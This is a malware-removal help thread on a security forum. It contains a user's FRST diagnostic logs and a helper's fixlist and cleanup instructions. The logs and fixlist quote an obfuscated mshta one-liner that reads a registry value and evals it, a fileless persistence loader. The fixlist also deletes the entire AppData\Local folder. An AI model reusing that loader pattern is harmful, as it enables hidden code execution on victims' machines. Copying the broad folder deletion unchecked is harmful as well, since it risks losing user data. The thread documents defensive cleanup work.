IE restricted site: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\007guard.com -> install.007guard.com
IE restricted site: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\008k.com -> www.008k.com
IE restricted site: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\00hq.com -> www.00hq.com
IE restricted site: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\010402.com -> 010402.com
IE restricted site: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\0scan.com -> www.0scan.com
IE restricted site: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\10sek.com -> www.10sek.com
IE restricted site: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\123simsen.com -> www.123simsen.com

There are 7913 more sites.


==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2006-11-02 06:23 - 2016-07-31 04:26 - 00452413 ____R C:\Windows\system32\Drivers\etc\hosts

127.0.0.1    localhost127.0.0.1    www.007guard.com
127.0.0.1    007guard.com
127.0.0.1    008i.com
127.0.0.1    www.008k.com
127.0.0.1    008k.com
127.0.0.1    www.00hq.com
127.0.0.1    00hq.com
127.0.0.1    010402.com
127.0.0.1    www.032439.com
127.0.0.1    032439.com
127.0.0.1    www.0scan.com
127.0.0.1    0scan.com
127.0.0.1    1000gratisproben.com
127.0.0.1    www.1000gratisproben.com
127.0.0.1    1001namen.com
127.0.0.1    www.1001namen.com
127.0.0.1    100888290cs.com
127.0.0.1    www.100888290cs.com
127.0.0.1    www.100sexlinks.com
127.0.0.1    100sexlinks.com
127.0.0.1    10sek.com
127.0.0.1    www.10sek.com
127.0.0.1    www.1-2005-search.com
127.0.0.1    1-2005-search.com
127.0.0.1    123fporn.info
127.0.0.1    www.123fporn.info
127.0.0.1    www.123haustiereundmehr.com
127.0.0.1    123haustiereundmehr.com
127.0.0.1    123moviedownload.com
127.0.0.1    www.123moviedownload.com

There are 15552 more lines.


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\img31.jpg
DNS Servers: 192.168.1.254
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 1) (EnableLUA: 1)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^HP Digital Imaging Monitor.lnk => C:\Windows\pss\HP Digital Imaging Monitor.lnk.CommonStartup
MSCONFIG\startupreg: Acer Tour Reminder => C:\Acer\AcerTour\Reminder.exe
MSCONFIG\startupreg: AcerOrbicamRibbon => "C:\Program Files\Acer\OrbiCam10\OrbiCam.exe" /hide
MSCONFIG\startupreg: APSDaemon => "C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: SynTPEnh => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
MSCONFIG\startupreg: WindowsWelcomeCenter => rundll32.exe oobefldr.dll,ShowWelcomeCenter

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [WinCollab-Out-UDP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-In-UDP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-Out-TCP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-In-TCP] => (Allow) %ProgramFiles%\Windows Collaboration\WinCollab.exe
FirewallRules: [WinCollab-DFSR-Out-TCP] => (Allow) %SystemRoot%\system32\dfsr.exe
FirewallRules: [WinCollab-DFSR-In-TCP] => (Allow) %SystemRoot%\system32\dfsr.exe
FirewallRules: [{352B8529-2E81-42C2-A8DC-68C32F775569}] => (Allow) C:\Program Files\Common Files\Mcafee\Platform\McSvcHost\McSvHost.exe
StandardProfile\AuthorizedApplications: [C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe] => Enabled:Spybot - Search & Destroy tray access
StandardProfile\AuthorizedApplications: [C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe] => Enabled:Spybot-S&D 2 Scanner Service
StandardProfile\AuthorizedApplications: [C:\Program Files\Spybot - Search & Destroy 2\SDUpdate.exe] => Enabled:Spybot-S&D 2 Updater
StandardProfile\AuthorizedApplications: [C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe] => Enabled:Spybot-S&D 2 Background update service

==================== Restore Points =========================

29-07-2016 15:09:11 Windows Update
30-07-2016 14:25:33 Scheduled Checkpoint
31-07-2016 13:41:36 Scheduled Checkpoint
31-07-2016 21:21:19 Restore Operation
01-08-2016 10:24:14 Scheduled Checkpoint

==================== Faulty Device Manager Devices =============

Name: Camera
Description: Camera
Class Guid:
Manufacturer:
Service:
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Event log errors: =========================

Application errors:
==================
Error: (08/02/2016 10:15:47 AM) (Source: Windows Search Service) (EventID: 3079) (User: )
Description: Notifications for the volume f:\ are not active.

Context: Windows Application

Details:
    The device is not ready.   (0x80070015)

Error: (08/02/2016 07:17:49 AM) (Source: Windows Search Service) (EventID: 3013) (User: )
Description: The entry <C:\USERS\SCOTT\APPDATA\LOCAL\MOZILLA\FIREFOX\PROFILES\TCDP74MY.DEFAULT-1470081235988\SAFEBROWSING-TO_DELETE> in the hash map cannot be updated.

Context:  Application, SystemIndex Catalog

Details:
    A device attached to the system is not functioning.   (0x8007001f)

Error: (08/01/2016 05:39:49 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 2046530

Error: (08/01/2016 05:39:49 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 2046530

Error: (08/01/2016 05:39:49 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (08/01/2016 05:39:48 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 2045423

Error: (08/01/2016 05:39:48 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 2045423

Error: (08/01/2016 05:39:48 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second

Error: (08/01/2016 05:39:47 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 2044424

Error: (08/01/2016 05:39:47 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 2044424


System errors:
=============
Error: (08/01/2016 12:13:27 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: 1068McNaiAnn{C90134D2-4AE9-407A-919A-4A2EF09C6C51}

Error: (08/01/2016 12:13:27 PM) (Source: DCOM) (EventID: 10005) (User: )
Description: 1068McNaiAnn{DC7EF8E1-824F-4110-AB43-1604DA9B4F40}

Error: (08/01/2016 12:09:55 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Network List ServiceNetwork Location Awareness%%1068 = The dependency service or group failed to start.


Error: (08/01/2016 12:09:55 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Network List ServiceNetwork Location Awareness%%1068 = The dependency service or group failed to start.


Error: (08/01/2016 12:09:55 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Network List ServiceNetwork Location Awareness%%1068 = The dependency service or group failed to start.


Error: (08/01/2016 12:09:55 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Network List ServiceNetwork Location Awareness%%1068 = The dependency service or group failed to start.


Error: (08/01/2016 12:09:55 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
Description: AFD
DfsC
mfehidk
NetBIOS
netbt
nsiproxy
PSched
RasAcd
rdbss
Smb
spldr
tdx
Wanarpv6
ws2ifsl

Error: (08/01/2016 12:09:55 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: McAfee Proxy ServiceMcAfee Firewall Core Service%%1068 = The dependency service or group failed to start.


Error: (08/01/2016 12:09:55 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: McAfee Personal Firewall ServiceMcAfee Firewall Core Service%%1068 = The dependency service or group failed to start.


Error: (08/01/2016 12:09:55 PM) (Source: Service Control Manager) (EventID: 7001) (User: )
Description: Network List ServiceNetwork Location Awareness%%1068 = The dependency service or group failed to start.



CodeIntegrity:
===================================
  Date: 2016-08-02 12:08:53.896
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\45F8A0B2.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-08-02 12:08:53.337
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\45F8A0B2.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-08-02 12:08:52.763
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\45F8A0B2.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-08-02 12:08:52.196
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\45F8A0B2.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-08-02 12:07:28.530
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\45F8A0B2.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-08-02 12:07:27.964
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\45F8A0B2.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-08-02 12:07:27.283
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\45F8A0B2.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-08-02 12:07:26.654
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\45F8A0B2.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-07-31 04:32:48.304
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\45F8A0B2.sys because the set of per-page image hashes could not be found on the system.

  Date: 2016-07-31 04:32:47.321
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\45F8A0B2.sys because the set of per-page image hashes could not be found on the system.


==================== Memory info ===========================

Processor: Intel® Core™ Duo CPU T2350 @ 1.86GHz
Percentage of memory in use: 63%
Total physical RAM: 2549.44 MB
Available physical RAM: 937.09 MB
Total Virtual: 5315.66 MB
Available Virtual: 3414.07 MB

==================== Drives ================================

Drive c: (ACER) (Fixed) (Total:70.62 GB) (Free:24.65 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive d: (ACERDATA) (Fixed) (Total:70.61 GB) (Free:65.37 GB) NTFS
Drive f: (TOSHIBA EXT) (Fixed) (Total:465.66 GB) (Free:426.95 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 149.1 GB) (Disk ID: AFC5AFC5)
Partition 1: (Not Active) - (Size=7.8 GB) - (Type=12)
Partition 2: (Active) - (Size=70.6 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=70.6 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (Size: 465.8 GB) (Disk ID: 4A7EB801)
Partition 1: (Not Active) - (Size=465.7 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================

 

 

 



BC AdBot (Login to Remove)

 


#2 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,474 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:09 PM

Posted 02 August 2016 - 11:53 AM

Hi vistanovice :)

My name is Aura and I'll be assisting you with your malware issue. Since we'll be working together, you can call me Aura or Yoan, which is my real name, it's up to you! Now that we've broke the ice, I'll just ask you a few things during the time we'll be working together to clean your system and get it back to an operational state.
  • As you'll notice, the logs we are asking for here are quite lenghty, so it's normal for me to not reply exactly after you post them. This is because I need some time to analyse them and then act accordingly. However, I'll always reply within 24 hours, 48 hours at most if something unexpected happens;
  • As long as I'm assisting you on BleepingComputer, in this thread, I'll ask you to not seek assistance anywhere else for any issue related to the system we are working on. If you have an issue, question, etc. about your computer, please ask it in this thread and I'll assist you;
  • The same principle applies to any modifications you make to your system, I would like you to ask me before you do any manipulations that aren't in the instructions I posted. This is to ensure that we are operating in sync and I know exactly what's happening on your system;
  • If you aren't sure about an instruction I'm giving you, ask me about it. This is to ensure that the clean-up process goes without any issue. I'll answer you and even give you more precise instructions/explanations if you need. There's no shame in asking questions here, better be safe than sorry!;
  • If you don't reply to your thread within 3 days, I'll bump this thread to let you know that I'm waiting for you. If you don't reply after 5 days, it'll be closed. If you return after that period, you can send me a PM to get it unlocked and we'll continue where we left off;
  • Since malware can work quickly, we want to get rid of them as fast as we can, before they make unknown changes to the system. This being said, I would appreciate if you could reply to this thread within 24 hours of me posting. This way, we'll have a good clean-up rhythm and the chances of complications will be reduced;
  • I'm against any form of pirated, illegal and counterfeit software and material. So if you have any installed on your system, I'll ask you to uninstall them right now. You don't have to tell me if you indeed had some or not, I'll give you the benefit of the doubt. Plus, this would be against BleepingComputer's rules;
  • In the end, you are the one asking for assistance here. So if you wish to go a different way during the clean-up, like format and reinstall Windows, you are free to do so. I would appreciate you to let me know about it first, and if you need, I can also assist you in the process;
  • I would appreciate if you were to stay with me until the end, which means, until I declare your system clean. Just because your system isn't behaving weirdly anymore, or is running better than before, it doesn't mean that the infection is completely gone;
  • Since I'm still a trainee, all my posts have to be reviewed by an instructor prior to be posted to make sure that you receive the best assistance possible. Sorry for the inconvenience. This being said, I have a full time job, and I also have night classes on Mondays and Wednesdays, which means that if you reply during these two days, it'll take longer for me to reply to you. Don't worry, you'll be my first priority as soon as I get home and have time to look at your thread;
This being said, it's time to clean-up some malware, so let's get started, shall we? :)

Please give me a few hours to review your logs and come up with a reply.

Thank you!

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#3 vistanovice

vistanovice
  • Topic Starter

  • Members
  • 66 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:09 PM

Posted 02 August 2016 - 12:00 PM

Thanks Aura. I'm in standby mode.



#4 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,474 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:09 PM

Posted 02 August 2016 - 02:11 PM

Thank you for waiting!

warning.gifMalicious Programs Warning!

I noticed that you have malicious programs installed on your system. I'll ask you to uninstall them since uninstalling such programs before running malware removal tools will ensure a better clean-up.
  • QuickShare
If you have an issue when uninstalling a program, please let me know.
 
We'll start with a first FRST fix, followed by a quick sweep with JRT and AdwCleaner. Follow the instructions below please.

iO3R662.pngFarbar Recovery Scan Tool (FRST) - Fix mode
Follow the instructions below to execute a fix on your system using FRST, and provide the log in your next reply.
  • Right-click on your Desktop, select New and click on Text Document. Name it fixlist (make sure it's a .txt file) and press on Enter;
  • Open the file you just created and copy/paste the content below in it, then save it (Ctrl + S);
    CloseProcesses:
    CreateRestorePoint:
    
    HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\Run: [**rplp<*>] => "C:\Users\Scott\AppData\Local\88f2fc\209cb6.lnk" <===== ATTENTION (Value Name with invalid characters)
    Startup: C:\Users\Scott\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a898e3.lnk [2016-08-02]
    ShortcutTarget: a898e3.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
    Startup: C:\Users\Scott\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dff6bb.lnk [2016-08-02]
    ShortcutTarget: dff6bb.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
    BootExecute: autocheck autochk /p \??\F:autocheck autochk * sasnative32
    CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
    
    HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
    HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
    URLSearchHook: HKLM - (No Name) - {f0e98552-8e47-4c6c-9b3a-11ab0549f94d} -  No File
    SearchScopes: HKLM -> {9BB47C17-9C68-4BB3-B188-DD9AF0FD2102} URL = hxxp://dts.search.ask.com/sr?src=ieb&gct=ds&appid=136&systemid=102&v=a14978-572&apn_uid=0461180772134103&apn_dtid=BND102&o=APN10646&apn_ptnrs=AG7&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002 -> {9BB47C17-9C68-4BB3-B188-DD9AF0FD2102} URL = hxxp://dts.search.ask.com/sr?src=ieb&gct=ds&appid=136&systemid=102&v=a14978-572&apn_uid=0461180772134103&apn_dtid=BND102&o=APN10646&apn_ptnrs=AG7&q={searchTerms}
    Toolbar: HKLM - No Name - {ba00b7b1-0351-477a-b948-23e3ee5a73d4} -  No File
    Toolbar: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
    
    FF Plugin: @exent.com/npExentCtl,version=7.0.0.0 -> C:\Program Files\Free Ride Games\npExentCtl.dll [No File]
    FF Plugin: www.exent.com/GameTreatWidget -> C:\Program Files\Free Ride Games\NPGameTreatPlugin.dll [No File]
    
    S3 ADASPROT; \??\C:\Program Files\Advanced System Optimizer 3\adasprot32.sys [X]
    S3 catchme; \??\C:\Users\Scott\AppData\Local\Temp\catchme.sys [X]
    S3 EraserUtilDrv11010; \??\C:\Program Files\Common Files\Symantec Shared\EENGINE\EraserUtilDrv11010.sys [X]
    S3 lv321av; system32\DRIVERS\lv321av.sys [X]
    S3 SymIMMP; system32\DRIVERS\SymIM.sys [X]
    
    Task: {009FF3C0-2C63-45C9-9B64-43C4F90DF8E4} - System32\Tasks\LaunchSignup => C:\Program Files\MyPC Backup\Signup Wizard.exe <==== ATTENTION
    Task: {46915187-2476-47E8-A559-AC136E5B9623} - \Updater26278.exe -> No File <==== ATTENTION
    Task: {620CA66F-41E3-47CB-BEBA-F53DCCFBE17C} - System32\Tasks\{7405A8FC-F14B-4911-951F-71D63B7EBC89} => pcalua.exe -a "C:\Program Files\QuickTime\QTSystem\QuickTime.cpl" -c QuickTime
    Task: {86DCA0FE-8E5A-4673-8256-4A44E3D4BE2A} - System32\Tasks\{361D96D2-3953-46A8-9C2E-9F6695CD3A7C} => pcalua.exe -a E:\setup.exe -d E:\
    
    HKLM\...\cmdfile\DefaultIcon: %SystemRoot%\System32\imageres.dll,-68 <===== ATTENTION
    HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\Software\Classes\5e097f: "C:\Windows\system32\mshta.exe" "javascript:oB2RUH="oGt";mN71=new ActiveXObject("WScript.Shell");unRi22V="qmhHM";w0TVp=mN71.RegRead("HKCU\\software\\jiun\\thufoby");sh9jvJ="vImph";eval(w0TVp);z83FTbxB="RntD";" <===== ATTENTION
    
    REG: REG DELETE "HKEY_CURRENT_USER\SOFTWARE\jiun" /f
    CMD: TYPE "C:\Users\Scott\AppData\Local\88f2fc\6da7a4.bat"
    
    C:\Program Files\Advanced System Optimizer 3
    C:\Program Files\Free Ride Games
    C:\Program Files\MyPC Backup
    C:\Program Files\Common Files\Symantec Shared
    C:\Users\Scott\AppData\Local
    C:\Users\Scott\AppData\Local\88f2fc\209cb6.lnk
    C:\Users\Scott\AppData\Local\88f2fc\6da7a4.bat
    C:\Users\Scott\AppData\Roaming\0a30ba
    C:\Windows\system32\DRIVERS\lv321av.sys
    C:\Windows\system32\DRIVERS\SymIM.sys
    
    EmptyTemp:
    
  • Right-click on the FRST executable and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Click on the Fix button;
    NYA5Cbr.png
  • On completion, a message will come up saying that the fix has been completed and it'll open a log in Notepad;
  • Copy and paste its content in your next reply;
iT103hr.pngJunkware Removal Tool (JRT)
  • Download Junkware Removal Tool (JRT) and move it to your Desktop;
  • Right-click on JRT.exe and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Press on any key to launch the scan and let it complete;
    tLsXbWy.png
    Credits : BleepingComputer.com
  • Once the scan is complete, a log will open. Please copy/paste the content of the output log in your next reply;
zcMPezJ.pngAdwCleaner - Fix Mode
  • Download AdwCleaner and move it to your Desktop;
  • Right-click on AdwCleaner.exe and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users);
  • Accept the EULA (I accept), let the database update, then click on Scan;
  • Let the scan complete. Once it's done, make sure that every item listed in the different tabs is checked and click on the Cleaning button. This will kill all the active processes;
    CfdTLN1.png
  • Once the cleaning process is complete, AdwCleaner will ask to restart your computer, do it;
  • After the restart, a log will open when logging in. Please copy/paste the content of that log in your next reply;
Your next reply(ies) should therefore contain:
  • Confirmation that you uninstalled the program listed above (if not, let me know);
  • Copy/pasted content of the FRST fixlog.txt;
  • Copy/pasted JRT log;
  • Copy/pasted AdwCleaner clean log;

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#5 vistanovice

vistanovice
  • Topic Starter

  • Members
  • 66 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:09 PM

Posted 02 August 2016 - 04:46 PM

Thanks Aura. I'm in standby mode.

 

Aura,

I cannot find a program called Quickshare. I ran a search and the filename didn't appear - the only thing close to it is Quicktime. Can you help?



#6 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,474 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:03:09 PM

Posted 02 August 2016 - 04:51 PM

QuickShare is an installed program, therefore you need to uninstall it from the Control Panel, under "Uninstall a program". If you don't see it listed there, you can move on to the next set of instructions, we'll address it later :)

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#7 vistanovice

vistanovice
  • Topic Starter

  • Members
  • 66 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:09 PM

Posted 02 August 2016 - 07:56 PM

Ran FRST.

 

But unable to open JRT. Tried to download & extract 3 times. I get the error message attached. The 3rd time, I got a file in Chinese on my desktop.

 

I haven't run Adaware until you let me know whether to proceed without running the JRT.

 

Here's the FRST log.

 

 

Fix result of Farbar Recovery Scan Tool (x86) Version: 27-07-2016
Ran by Scott (2016-08-02 20:22:18) Run:1
Running from C:\Users\Scott\Desktop
Loaded Profiles: Scott (Available Profiles: Scott)
Boot Mode: Normal

==============================================

fixlist content:
*****************
CloseProcesses:
CreateRestorePoint:

HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\...\Run: [**rplp<*>] => "C:\Users\Scott\AppData\Local\88f2fc\209cb6.lnk" <===== ATTENTION (Value Name with invalid characters)
Startup: C:\Users\Scott\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a898e3.lnk [2016-08-02]
ShortcutTarget: a898e3.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Startup: C:\Users\Scott\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\dff6bb.lnk [2016-08-02]
ShortcutTarget: dff6bb.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
BootExecute: autocheck autochk /p \??\F:autocheck autochk * sasnative32
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
URLSearchHook: HKLM - (No Name) - {f0e98552-8e47-4c6c-9b3a-11ab0549f94d} -  No File
SearchScopes: HKLM -> {9BB47C17-9C68-4BB3-B188-DD9AF0FD2102} URL = hxxp://dts.search.ask.com/sr?src=ieb&gct=ds&appid=136&systemid=102&v=a14978-572&apn_uid=0461180772134103&apn_dtid=BND102&o=APN10646&apn_ptnrs=AG7&q={searchTerms}
SearchScopes: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002 -> {9BB47C17-9C68-4BB3-B188-DD9AF0FD2102} URL = hxxp://dts.search.ask.com/sr?src=ieb&gct=ds&appid=136&systemid=102&v=a14978-572&apn_uid=0461180772134103&apn_dtid=BND102&o=APN10646&apn_ptnrs=AG7&q={searchTerms}
Toolbar: HKLM - No Name - {ba00b7b1-0351-477a-b948-23e3ee5a73d4} -  No File
Toolbar: HKU\S-1-5-21-3182237591-3162957894-2498692213-1002 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File

FF Plugin: @exent.com/npExentCtl,version=7.0.0.0 -> C:\Program Files\Free Ride Games\npExentCtl.dll [No File]
FF Plugin: www.exent.com/GameTreatWidget -> C:\Program Files\Free Ride Games\NPGameTreatPlugin.dll [No File]

S3 ADASPROT; \??\C:\Program Files\Advanced System Optimizer 3\adasprot32.sys [X]
S3 catchme; \??\C:\Users\Scott\AppData\Local\Temp\catchme.sys [X]
S3 EraserUtilDrv11010; \??\C:\Program Files\Common Files\Symantec Shared\EENGINE\EraserUtilDrv11010.sys [X]
S3 lv321av; system32\DRIVERS\lv321av.sys [X]
S3 SymIMMP; system32\DRIVERS\SymIM.sys [X]

Task: {009FF3C0-2C63-45C9-9B64-43C4F90DF8E4} - System32\Tasks\LaunchSignup => C:\Program Files\MyPC Backup\Signup Wizard.exe <==== ATTENTION
Task: {46915187-2476-47E8-A559-AC136E5B9623} - \Updater26278.exe -> No File <==== ATTENTION
Task: {620CA66F-41E3-47CB-BEBA-F53DCCFBE17C} - System32\Tasks\{7405A8FC-F14B-4911-951F-71D63B7EBC89} => pcalua.exe -a "C:\Program Files\QuickTime\QTSystem\QuickTime.cpl" -c QuickTime
Task: {86DCA0FE-8E5A-4673-8256-4A44E3D4BE2A} - System32\Tasks\{361D96D2-3953-46A8-9C2E-9F6695CD3A7C} => pcalua.exe -a E:\setup.exe -d E:\

HKLM\...\cmdfile\DefaultIcon: %SystemRoot%\System32\imageres.dll,-68 <===== ATTENTION
HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\Software\Classes\5e097f: "C:\Windows\system32\mshta.exe" "javascript:oB2RUH="oGt";mN71=new ActiveXObject("WScript.Shell");unRi22V="qmhHM";w0TVp=mN71.RegRead("HKCU\\software\\jiun\\thufoby");sh9jvJ="vImph";eval(w0TVp);z83FTbxB="RntD";" <===== ATTENTION

REG: REG DELETE "HKEY_CURRENT_USER\SOFTWARE\jiun" /f
CMD: TYPE "C:\Users\Scott\AppData\Local\88f2fc\6da7a4.bat"

C:\Program Files\Advanced System Optimizer 3
C:\Program Files\Free Ride Games
C:\Program Files\MyPC Backup
C:\Program Files\Common Files\Symantec Shared
C:\Users\Scott\AppData\Local
C:\Users\Scott\AppData\Local\88f2fc\209cb6.lnk
C:\Users\Scott\AppData\Local\88f2fc\6da7a4.bat
C:\Users\Scott\AppData\Roaming\0a30ba
C:\Windows\system32\DRIVERS\lv321av.sys
C:\Windows\system32\DRIVERS\SymIM.sys

EmptyTemp:
*****************

Processes closed successfully.
Restore point was successfully created.
HKU\S-1-5-21-3182237591-3162957894-2498692213-1002\Software\Microsoft\Windows\CurrentVersion\Run\\**rplp<*> => value could not remove. Error in Deleting Value: C0000034
C:\Users\Scott\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a898e3.lnk => moved successfully
